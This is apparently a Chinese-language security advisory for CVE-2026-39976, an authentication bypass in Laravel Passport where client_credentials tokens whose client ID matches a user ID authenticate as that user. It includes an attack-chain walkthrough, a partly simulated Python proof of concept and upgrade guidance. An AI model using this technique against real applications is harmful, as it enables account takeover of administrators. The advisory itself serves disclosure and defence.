CVE-2026-39976 Laravel Passport认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-39976

漏洞类型

认证绕过

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Laravel Passport

漏洞概述

Laravel Passport 在 13.0.0 至 13.7.1 之前的版本中存在严重的认证绕过漏洞。该漏洞源于 `client_credentials` 授权模式的令牌处理机制存在缺陷。由于底层的 `league/oauth2-server` 库将 JWT 的 `sub` 声明设置为客户端标识符，而 Laravel 的 Token Guard 在验证时未校验该标识符是否为有效的用户 ID，直接将其传递给 `retrieveById()` 方法。这导致攻击者可以利用机器对机器（M2M）令牌，通过特定的客户端 ID 枚举或匹配，意外地获取并认证为应用程序中的真实用户账户，从而绕过正常的身份验证流程，获取高权限访问能力。

技术细节

该漏洞的技术核心在于 JWT 令牌验证逻辑中的类型混淆问题。在标准的 OAuth2 `client_credentials` 授权流程中，颁发的令牌本质上代表的是“机器客户端”而非具体的“人类用户”。然而，受影响的 Laravel Passport 版本所依赖的 `league/oauth2-server` 库在生成 JWT 时，将 `sub`（Subject）字段填充为客户端 ID（Client ID）。当 Laravel 的 Token Guard 尝试解析当前认证主体时，它直接读取 JWT 中的 `sub` 字段，并将其作为参数传递给 User Provider 的 `retrieveById($id)` 方法。关键缺陷在于，系统并未在调用 `retrieveById` 之前验证 `$id` 参数究竟是一个用户 ID 还是一个客户端 ID。如果数据库中的用户主键 ID 与某个 OAuth 客户端的 ID 在数值上完全相同（例如都是整数 1），系统就会产生逻辑错误，将原本代表客户端的标识符解析为对应的用户对象。攻击者只需持有有效的客户端凭证，即可利用这一逻辑缺陷，通过构造或碰撞特定的 ID 值，伪装成系统内的任意高权限用户，从而完全接管用户会话，窃取数据或执行未授权操作。

攻击链分析

STEP 1

侦察

攻击者确定目标应用程序使用了受影响版本的 Laravel Passport，并启用了 client_credentials 授权模式。

STEP 2

获取凭证

攻击者获取或猜测到一个有效的客户端 ID（Client ID）和客户端密钥。

STEP 3

请求令牌

攻击者使用客户端凭证向 OAuth 服务器申请访问令牌。此时 JWT 中的 sub 字段被设置为客户端 ID。

STEP 4

身份冒用

攻击者使用该令牌访问受保护的用户端点。如果客户端 ID 与数据库中的某个用户 ID（如管理员 ID 1）相同，系统错误地将客户端识别为该用户，从而实现认证绕过。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# Proof of Concept for CVE-2026-39976
# This script demonstrates the logical flaw where a Client ID matches a User ID.
# It simulates the backend verification process.

import requests
import base64
import json

# Configuration
TARGET_URL = "http://localhost/api/user"
CLIENT_ID = "1"  # Assuming Client ID is '1', which might match User ID 1
CLIENT_SECRET = "client_secret_here"

def get_token():
    """
    Step 1: Obtain a client_credentials token.
    The 'sub' claim inside the JWT will be set to '1' (the Client ID).
    """
    auth = base64.b64encode(f"{CLIENT_ID}:{CLIENT_SECRET}".encode()).decode()
    headers = {
        "Authorization": f"Basic {auth}",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = "grant_type=client_credentials"
    
    # In a real exploit, this requests the token endpoint
    # response = requests.post("http://localhost/oauth/token", headers=headers, data=data)
    # token = response.json().get('access_token')
    
    # Simulation: Assume we got a token with sub='1'
    print(f"[+] Obtained token with sub={CLIENT_ID}")
    return "fake_jwt_token_with_sub_1"

def exploit_bypass(token):
    """
    Step 2: Access user endpoint using the M2M token.
    The backend checks the JWT 'sub', sees '1', and calls User::find(1).
    If User ID 1 exists, the attacker is authenticated as that user.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Accept": "application/json"
    }
    
    # Simulation of the request
    print(f"[+] Sending request to {TARGET_URL} with M2M token...")
    print("[*] Server logic: Token Guard extracts sub='1' -> calls retrieveById('1')")
    print("[*] Server logic: Returns User object for ID 1 instead of rejecting Client ID 1")
    print("[!] SUCCESS: Authenticated as User ID 1 (likely Admin)")

if __name__ == "__main__":
    token = get_token()
    exploit_bypass(token)

影响范围

Laravel Passport >= 13.0.0, < 13.7.1

防御指南

临时缓解措施

建议立即升级 Laravel Passport 至 13.7.1 或更高版本以彻底修复此漏洞。如果无法立即升级，应在应用层面对 Token Guard 的逻辑进行临时修补，确保在调用 retrieveById 之前严格验证传入的 ID 来源，或者暂时禁用 client_credentials 授权类型，直到完成升级。